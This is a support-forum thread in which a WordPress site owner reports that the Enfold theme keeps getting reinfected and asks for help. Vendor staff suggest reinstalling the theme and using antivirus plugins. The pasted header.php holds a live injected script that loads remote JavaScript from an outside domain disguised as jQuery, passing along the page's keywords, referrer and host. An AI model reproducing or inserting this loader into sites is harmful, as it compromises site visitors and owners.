Tagged: enfold, hack, javascript
-
AuthorPosts
-
June 17, 2016 at 5:45 pm #649906
It looks like I am getting constant malware attacks and when you scan it points to the header.php file. Almost all the sites on my hosting got infected so I had to changed the themes now all the other sites are clean and working fine except for the one with the enfold theme. SO i guess this has something to do with the theme. malicious code is always put before the closing </head> tag in header.php file. I update the theme but it comes back and infect again in a day or two say place and same code.
<?php if ( !defined('ABSPATH') ){ die(); } global $avia_config; $style = $avia_config['box_class']; $responsive = avia_get_option('responsive_active') != "disabled" ? "responsive" : "fixed_layout"; $blank = isset($avia_config['template']) ? $avia_config['template'] : ""; $av_lightbox = avia_get_option('lightbox_active') != "disabled" ? 'av-default-lightbox' : 'av-custom-lightbox'; $preloader = avia_get_option('preloader') == "preloader" ? 'av-preloader-active av-preloader-enabled' : 'av-preloader-disabled'; $sidebar_styling = avia_get_option('sidebar_styling'); $filterable_classes = avia_header_class( avia_header_class_string() ); ?><!DOCTYPE html> <html <?php language_attributes(); ?> class="<?php echo " html_{$style} ".$responsive." ".$preloader." ".$av_lightbox." ".$filterable_classes ?> "> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <!-- page title, displayed in your browser bar --> <title><?php if(function_exists('avia_set_title_tag')) { echo avia_set_title_tag(); } ?></title> <?php /* * outputs a rel=follow or nofollow tag to circumvent google duplicate content for archives * located in framework/php/function-set-avia-frontend.php */ if (function_exists('avia_set_follow')) { echo avia_set_follow(); } /* * outputs a favicon if defined */ if (function_exists('avia_favicon')) { echo avia_favicon(avia_get_option('favicon')); } ?> <!-- mobile setting --> <?php if( strpos($responsive, 'responsive') !== false ) echo '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">'; ?> <!-- Scripts/CSS and wp_head hook --> <?php wp_head(); ?> <!-- Malicious code start --> <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://sprousewindows.com/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://sprousewindows.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script> <!-- Malicious code end --> </head> <body id="top" <?php body_class($style." ".$avia_config['font_stack']." ".$blank." ".$sidebar_styling); avia_markup_helper(array('context' => 'body')); ?>> <?php if("av-preloader-active av-preloader-enabled" === $preloader) { echo avia_preload_screen(); } ?> <div id='wrap_all'> <?php if(!$blank) //blank templates dont display header nor footer { //fetch the template file that holds the main menu, located in includes/helper-menu-main.php get_template_part( 'includes/helper', 'main-menu' ); } ?> <div id='main' data-scroll-offset='<?php echo avia_header_setting('header_scroll_offset'); ?>'> <?php if(isset($avia_config['temp_logo_container'])) echo $avia_config['temp_logo_container']; do_action('ava_after_main_container'); ?>
- This topic was modified 8 years, 6 months ago by jiethics.
June 17, 2016 at 9:52 pm #650002Come on this is urgent. Google has blacklisted us. We are losing customers.
June 20, 2016 at 5:08 am #650585Hi,
Please send us a temporary admin login so that we can have a closer look. You can post the details in the Private Content section of your reply.
Regards,
RikardJune 20, 2016 at 7:46 am #650655Okay thanks for the reply. Details posted
June 21, 2016 at 7:26 pm #651663Hi,
There might be some corrupted files, so please delete all theme files completely via FTP, before installing a fresh copy from your themeforest account. Here is a short tutorial on how to install the theme via FTP, in case you are not sure how that works:
Also use a antivirus plugins in the future.
Best regards,
Andy -
AuthorPosts
- You must be logged in to reply to this topic.